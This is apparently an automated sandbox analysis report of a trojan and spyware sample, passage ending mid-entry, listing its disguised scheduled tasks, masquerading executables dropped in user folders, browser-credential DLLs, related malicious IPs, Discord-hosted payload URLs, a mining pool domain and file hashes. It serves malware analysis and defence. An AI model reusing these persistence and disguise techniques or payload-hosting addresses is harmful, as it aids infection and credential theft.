Sample file name:	N2wufLmC74.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	62
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@97/31@6/5
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 44.5% (good quality ratio 33.6%) Quality average: 58.3% Quality standard deviation: 39.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 51 Number of non-executed functions: 197
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 8.253.204.120, 8.238.190.126, 67.27.158.126, 67.27.157.126, 8.241.126.121
Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ctldl.windowsupdate.com, api.peer2profit.com, wu-bg-shim.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:32:25	API Interceptor	109x Sleep call for process: vbc.exe modified
01:32:34	Task Scheduler	Run new task: MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} path: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe
01:32:35	API Interceptor	1x Sleep call for process: brave.exe modified
01:32:36	API Interceptor	67x Sleep call for process: conchsvt.exe modified
01:32:37	API Interceptor	145x Sleep call for process: powershell.exe modified
01:32:39	Task Scheduler	Run new task: MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca} path: C:\Users\user\AppData\Local\Google\ofg.exe
01:32:42	API Interceptor	2x Sleep call for process: chrome.exe modified
01:32:46	Task Scheduler	Run new task: GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe} path: C:\Users\user\AppData\Local\Google\chrome.exe
01:33:01	Task Scheduler	Run new task: GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5} path: C:\Users\user\AppData\Local\Google\chrome.exe
01:34:10	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
77.73.133.23	24RWSHCueV.exe	Get hash	malicious	Browse	77.73.133.23/0412de9fc055f57867027f3a8fc8f659
162.159.129.233	SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
	64AE5410F978DF0F48DCC67508820EA230C566967E002.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
	http://162.159.129.233	Get hash	malicious	Browse	162.159.129.233/favicon.ico
	2lfV6QiE6j.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
	SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
	1PhgF7ujwW.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
	vhNyVU8USk.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
	Order 4503860408.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/809311531652087809/839376179840286770/originbot4.0.exe
	cotizacin.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/812102734177763331/819187064415191071/bextrit.exe
	SecuriteInfo.com.PWS-FCXDF96A01717A58.15363.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/819169403979038784/819184830453514270/fraem.exe
	7G5RoevPnu.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/807746340997431316/809208342068199434/118fir2crtg.exe
	70% Balance Payment.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/785631384156110868/785631871395561492/italianmassloga.exe
	TT20201712.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
	ENQ-015August 2020 R1 Proj LOT.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
pool.hashvault.pro	file.exe	Get hash	malicious	Browse	95.179.241.203
	hZDPlQwZ9D.exe	Get hash	malicious	Browse	95.179.241.203
	eakFy9TvCC.exe	Get hash	malicious	Browse	45.76.89.70
	cfBJlHsOsz.exe	Get hash	malicious	Browse	95.179.241.203
	SecuriteInfo.com.Trojan.Siggen18.63785.2847.13207.exe	Get hash	malicious	Browse	45.76.89.70
	l5orrOFBzy.exe	Get hash	malicious	Browse	45.76.89.70
	file.exe	Get hash	malicious	Browse	45.76.89.70
	file.exe	Get hash	malicious	Browse	95.179.241.203
	file.exe	Get hash	malicious	Browse	45.76.89.70
	FZrpWLVGZT.exe	Get hash	malicious	Browse	95.179.241.203
	2Yhq6CHu0a.exe	Get hash	malicious	Browse	95.179.241.203
	E3BaMFIxln.exe	Get hash	malicious	Browse	95.179.241.203
	mqZSIT6ZSG.exe	Get hash	malicious	Browse	45.76.89.70
	z1cfNNxfT1.exe	Get hash	malicious	Browse	95.179.241.203
	free_donate.exe	Get hash	malicious	Browse	45.76.89.70
	free_donate.exe	Get hash	malicious	Browse	95.179.241.203
	Loader.exe	Get hash	malicious	Browse	45.76.89.70
	NETSvc6.exe	Get hash	malicious	Browse	45.76.89.70
	AJ46HzaAxk.exe	Get hash	malicious	Browse	45.76.89.70
	KIDDIONS Menu.exe	Get hash	malicious	Browse	95.179.241.203
cdn.discordapp.com	Qeh843KFOM.exe	Get hash	malicious	Browse	162.159.133.233
	szA4lh2gwu.exe	Get hash	malicious	Browse	162.159.135.233
	file.exe	Get hash	malicious	Browse	162.159.130.233
	file.exe	Get hash	malicious	Browse	162.159.130.233
	Ym3gJd4O98.exe	Get hash	malicious	Browse	162.159.133.233
	noGUFzWlj0.exe	Get hash	malicious	Browse	162.159.133.233
	nnKAfjiwVA.exe	Get hash	malicious	Browse	162.159.130.233
	5DAukmL325.exe	Get hash	malicious	Browse	162.159.134.233
	ySVmNAODOA.exe	Get hash	malicious	Browse	162.159.133.233
	RZ66xgkgAs.exe	Get hash	malicious	Browse	162.159.129.233
	file.exe	Get hash	malicious	Browse	162.159.130.233
	JkoKzulbrv.exe	Get hash	malicious	Browse	162.159.134.233
	PO.exe	Get hash	malicious	Browse	162.159.133.233
	Invoice-N192793.xls	Get hash	malicious	Browse	162.159.135.233
	Setup.exe	Get hash	malicious	Browse	162.159.129.233
	Xi5jMqYwwB.exe	Get hash	malicious	Browse	162.159.129.233
	Software.exe	Get hash	malicious	Browse	162.159.135.233
	PO#specification803.dll	Get hash	malicious	Browse	162.159.130.233
	PO#specification803.dll	Get hash	malicious	Browse	162.159.135.233
	DOGLAA84299.dll	Get hash	malicious	Browse	162.159.135.233

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS43260TR	file.exe	Get hash	malicious	Browse	77.73.133.88
	O6tQQyRId9.exe	Get hash	malicious	Browse	77.73.133.113
	file.exe	Get hash	malicious	Browse	77.73.133.72
	file.exe	Get hash	malicious	Browse	77.73.133.72
	f1642b45acfb9014b62e9fd1e99bab115dd88fdcd92de.exe	Get hash	malicious	Browse	77.73.133.72
	file.exe	Get hash	malicious	Browse	77.73.133.72
	file.exe	Get hash	malicious	Browse	77.73.133.72
	file.exe	Get hash	malicious	Browse	77.73.133.72
	J2w2iaakUk.exe	Get hash	malicious	Browse	77.73.133.72
	file.exe	Get hash	malicious	Browse	77.73.133.72
	file.exe	Get hash	malicious	Browse	77.73.133.72
	file.exe	Get hash	malicious	Browse	77.73.133.72
	file.exe	Get hash	malicious	Browse	77.73.133.72
	file.exe	Get hash	malicious	Browse	77.73.133.72
	file.exe	Get hash	malicious	Browse	77.73.133.72
	g27m3GfEK7.exe	Get hash	malicious	Browse	77.73.133.72
	XnR6h4yoIb.exe	Get hash	malicious	Browse	77.73.133.72
	file.exe	Get hash	malicious	Browse	77.73.133.72
	file.exe	Get hash	malicious	Browse	77.73.133.72
	kmQCBYSt2t.exe	Get hash	malicious	Browse	77.73.133.85

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Browse	162.159.129.233
	file.exe	Get hash	malicious	Browse	162.159.129.233
	swift(USD 17043.50).exe	Get hash	malicious	Browse	162.159.129.233
	IMG785339720.exe	Get hash	malicious	Browse	162.159.129.233
	ETD-04-12-2022.exe	Get hash	malicious	Browse	162.159.129.233
	shipping documents.exe	Get hash	malicious	Browse	162.159.129.233
	PO IST-PO-2022-224.exe	Get hash	malicious	Browse	162.159.129.233
	Dogecoin-Miner2022.exe	Get hash	malicious	Browse	162.159.129.233
	pTYOSKlnMx.exe	Get hash	malicious	Browse	162.159.129.233
	dgQrZA8QAw.exe	Get hash	malicious	Browse	162.159.129.233
	SecuriteInfo.com.Win32.PWSX-gen.3693.17465.exe	Get hash	malicious	Browse	162.159.129.233
	Qeh843KFOM.exe	Get hash	malicious	Browse	162.159.129.233
	rvpBkEpg9B.exe	Get hash	malicious	Browse	162.159.129.233
	SecuriteInfo.com.Win32.CrypterX-gen.16708.32103.exe	Get hash	malicious	Browse	162.159.129.233
	MONTHLY SOA AGENT AUG-OCT.xlsx.exe	Get hash	malicious	Browse	162.159.129.233
	SecuriteInfo.com.Troj.Krypt-TF.5433.14899.exe	Get hash	malicious	Browse	162.159.129.233
	Atlas Price Inquiry.exe	Get hash	malicious	Browse	162.159.129.233
	620000.vbc.exe	Get hash	malicious	Browse	162.159.129.233
	SecuriteInfo.com.Trojan.MSIL.FormBook.AGCG.MTB.18730.19437.exe	Get hash	malicious	Browse	162.159.129.233
	Quotation.exe	Get hash	malicious	Browse	162.159.129.233

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files\Google\Chrome\updater.exe	setup.exe	Get hash	malicious	Browse
	hZDPlQwZ9D.exe	Get hash	malicious	Browse
	cfBJlHsOsz.exe	Get hash	malicious	Browse
	FKN6uh7y01.exe	Get hash	malicious	Browse
	6iWK0k820U.exe	Get hash	malicious	Browse
	E3BaMFIxln.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	Setup.exe	Get hash	malicious	Browse
	Loader.exe	Get hash	malicious	Browse
	AJ46HzaAxk.exe	Get hash	malicious	Browse
	Installer.exe	Get hash	malicious	Browse
	ndkqXR67bn.exe	Get hash	malicious	Browse
	NCVVe1Xqfs.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\Users\user\AppData\Local\Google\brave.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2884609
Entropy (8bit):	7.915812566955318
Encrypted:	false
SSDEEP:	49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
MD5:	EB27BB8CFA99D659E4FE023E9002ECD1
SHA1:	C783400302FDFAE0518269C5A5A8D4BAD29F42A3
SHA-256:	9C01D90543458567C4737731EE6754CC209E4BB78FF648EB75C4D23BE261EF2F
SHA-512:	AB5AD3C094ED1F094AA82D80D298E6D0AB15A94B58B007DBE8A6219FE8498569B5D9013D770BD9910F177F94F2639D84650655E8F60113051E98B386C49C36A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 85%
Joe Sandbox View:	Filename: setup.exe, Detection: malicious, Browse Filename: hZDPlQwZ9D.exe, Detection: malicious, Browse Filename: cfBJlHsOsz.exe, Detection: malicious, Browse Filename: FKN6uh7y01.exe, Detection: malicious, Browse Filename: 6iWK0k820U.exe, Detection: malicious, Browse Filename: E3BaMFIxln.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Loader.exe, Detection: malicious, Browse Filename: AJ46HzaAxk.exe, Detection: malicious, Browse Filename: Installer.exe, Detection: malicious, Browse Filename: ndkqXR67bn.exe, Detection: malicious, Browse Filename: NCVVe1Xqfs.exe, Detection: malicious, Browse
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...."Cc...............$......,................@..............................,.......,...`... .............................................. ,......`,.......+..8...........p,.............................`Z+.(....................$,.0............................text...x...........................`.P`.data.....'..0....'.................@.`..rdata..pP...0+..R....+.............@.`@.pdata...8....+..:...n+.............@.0@.xdata...1....+..2....+.............@.0@.bss..........,.......................`..idata....... ,.......+.............@.0..CRT....x....@,.......+.............@.@..tls.........P,.......+.............@.@..rsrc........`,.......+.............@.0..reloc.......p,.......,.............@.0B........................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Yr7L0gG5o6vn

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\aeSUC9unMzxl

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\bRpA2k0P5642

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	1.4755077381471955
Encrypted:	false
SSDEEP:	96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
MD5:	DEE86123FE48584BA0CE07793E703560
SHA1:	E80D87A2E55A95BC937AC24525E51AE39D635EF7
SHA-256:	60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
SHA-512:	65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	684984
Entropy (8bit):	6.857030838615762
Encrypted:	false
SSDEEP:	12288:0oUg2twzqWC4kBNv1pMByWk6TYnhCevOEH07OqHM65BaFBuY3NUNeCLIV/Rqnhab:0oUg2tJWC44WUuY3mMCLA/R+hw
MD5:	15B61E4A910C172B25FB7D8CCB92F754
SHA1:	5D9E319C7D47EB6D31AAED27707FE27A1665031C
SHA-256:	B2AE93D30C8BEB0B26F03D4A8325AC89B92A299E8F853E5CAA51BB32575B06C6
SHA-512:	7C1C982A2B597B665F45024A42E343A0A07A6167F77EE428A203F23BE94B5F225E22A270D1A41B655F3173369F27991770722D765774627229B6B1BBE2A6DC3F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.9b.........."!.........6...........................................................@A........................4,..S....,..........x............T..........8$...&...............................0..................D............................text............................... ..`.rdata.......0......................@..@.data...<F...@.......&..............@....00cfg...............(..............@..@.rsrc...x............*..............@..@.reloc..8$.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	627128
Entropy (8bit):	6.792651884784197
Encrypted:	false
SSDEEP:	12288:dfsiG5KNZea77VUHQqROmbIDm0ICRfCtbtEE/2OH9E2ARlZYSd:df53NZea3V+QqROmum0nRKx79E2ARlrd
MD5:	F07D9977430E762B563EAADC2B94BBFA
SHA1:	DA0A05B2B8D269FB73558DFCF0ED5C167F6D3877
SHA-256:	4191FAF7E5EB105A0F4C5C6ED3E9E9C71014E8AA39BBEE313BC92D1411E9E862
SHA-512:	6AFD512E4099643BBA3FC7700DD72744156B78B7BDA10263BA1F8571D1E282133A433215A9222A7799F9824F244A2BC80C2816A62DE1497017A4B26D562B7EAF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........V......./....................................................@A............................cQ......,....p...............r..........4C...........................W......h0...............................................text............................... ..`.rdata.......0......................@..@.data........0......................@....00cfg.......P....... ..............@..@.tls.........`......."..............@....rsrc........p.......$..............@..@.reloc..4C.......D..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	449280
Entropy (8bit):	6.670243582402913
Encrypted:	false
SSDEEP:	12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
MD5:	1FB93933FD087215A3C7B0800E6BB703
SHA1:	A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
SHA-256:	2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
SHA-512:	79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2042296
Entropy (8bit):	6.775178510549486
Encrypted:	false
SSDEEP:	49152:6dvFywfzFAF7fg39IwA49Kap9bGt+qoStYnOsbqbeQom7gN7BpDD5SkIN1g5D92+:pptximYfpx8OwNiVG09
MD5:	F67D08E8C02574CBC2F1122C53BFB976
SHA1:	6522992957E7E4D074947CAD63189F308A80FCF2
SHA-256:	C65B7AFB05EE2B2687E6280594019068C3D3829182DFE8604CE4ADF2116CC46E
SHA-512:	2E9D0A211D2B085514F181852FAE6E7CA6AED4D29F396348BEDB59C556E39621810A9A74671566A49E126EC73A60D0F781FA9085EB407DF1EEFD942C18853BE5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........&...............................................`............@A.........................!..\...T...@....@..x....................P..h...h...................................................\....!..@....................text...i........................... ..`.rdata..............................@..@.data....N.......*..................@....00cfg.......0......................@..@.rsrc...x....@......................@..@.reloc..h....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\o2ESbBndn91r

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	254392
Entropy (8bit):	6.686038834818694
Encrypted:	false
SSDEEP:	6144:uI7A8DMhFE2PlKOcpHSvV6x/CHQyhvs277H0mhWGzTdtb2bbIFxW7zrM2ruyYz+h:uI7A8DMhFE2PlbcpSv0x/CJVUmhDzTvS
MD5:	63A1FE06BE877497C4C2017CA0303537
SHA1:	F4F9CBD7066AFB86877BB79C3D23EDDACA15F5A0
SHA-256:	44BE3153C15C2D18F49674A092C135D3482FB89B77A1B2063D01D02985555FE0
SHA-512:	0475EDC7DFBE8660E27D93B7B8B5162043F1F8052AB28C87E23A6DAF9A5CB93D0D7888B6E57504B1F2359B34C487D9F02D85A34A7F17C04188318BB8E89126BF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...'.9b.........."!......................................................................@A........................tv..S....w...................................5..hq..............................................D{...............................text...V........................... ..`.rdata..............................@..@.data................~..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sqlite3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1099223
Entropy (8bit):	6.502588297211263
Encrypted:	false
SSDEEP:	24576:9jxwSkSteuT4P/y7HjsXAGJyGvN5z4Rui2IXLbO:9Vww8HyrjsvyWN54RZH+
MD5:	DBF4F8DCEFB8056DC6BAE4B67FF810CE
SHA1:	BBAC1DD8A07C6069415C04B62747D794736D0689
SHA-256:	47B64311719000FA8C432165A0FDCDFED735D5B54977B052DE915B1CBBBF9D68
SHA-512:	B572CA2F2E4A5CC93E4FCC7A18C0AE6DF888AA4C55BC7DA591E316927A4B5CFCBDDA6E60018950BE891FF3B26F470CC5CCE34D217C2D35074322AB84C32A25D1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".,b.v.........!......................... .....a......................................... .........................n................................... ...;...................................................................................text...............................`.P`.data...\|'... ...(..................@.`..rdata...D...P...F...:..............@.`@.bss....(.............................`..edata..n.......,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...;... ...<..................@.0B/4......8....`......................@.@B/19.....R....p......................@..B/31.....]'...@...(..................@..B/45......-...p......................@..B/57.....\............&..............@.0B/70.....#............2..

C:\Users\user\AppData\LocalLow\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80128
Entropy (8bit):	6.906674531653877
Encrypted:	false
SSDEEP:	1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
MD5:	1B171F9A428C44ACF85F89989007C328
SHA1:	6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
SHA-256:	9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
SHA-512:	99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\brave.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2884608
Entropy (8bit):	7.915813410181377
Encrypted:	false
SSDEEP:	49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
MD5:	9253ED091D81E076A3037E12AF3DC871
SHA1:	EC02829A25B3BF57AD061BBE54180D0C99C76981
SHA-256:	78E0A8309BC850037E12C2D72A5B0843DCD8B412A0A597C2A3DCBD44E9F3C859
SHA-512:	29FF2FD5F150D10B2D281A45DF5B44873192605DE8DC95278D6A7B5053370E4AC64A47100B13C63F3C048DF351A9B51F0B93AF7D922399A91508A50C152E8CF4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 85%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...."Cc...............$......,................@..............................,.......,...`... .............................................. ,......`,.......+..8...........p,.............................`Z+.(....................$,.0............................text...x...........................`.P`.data.....'..0....'.................@.`..rdata..pP...0+..R....+.............@.`@.pdata...8....+..:...n+.............@.0@.xdata...1....+..2....+.............@.0@.bss..........,.......................`..idata....... ,.......+.............@.0..CRT....x....@,.......+.............@.@..tls.........P,.......+.............@.@..rsrc........`,.......+.............@.0..reloc.......p,.......,.............@.0B........................................................................................................................................................................

C:\Users\user\AppData\Local\Google\chrome.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6423552
Entropy (8bit):	7.922005336740627
Encrypted:	false
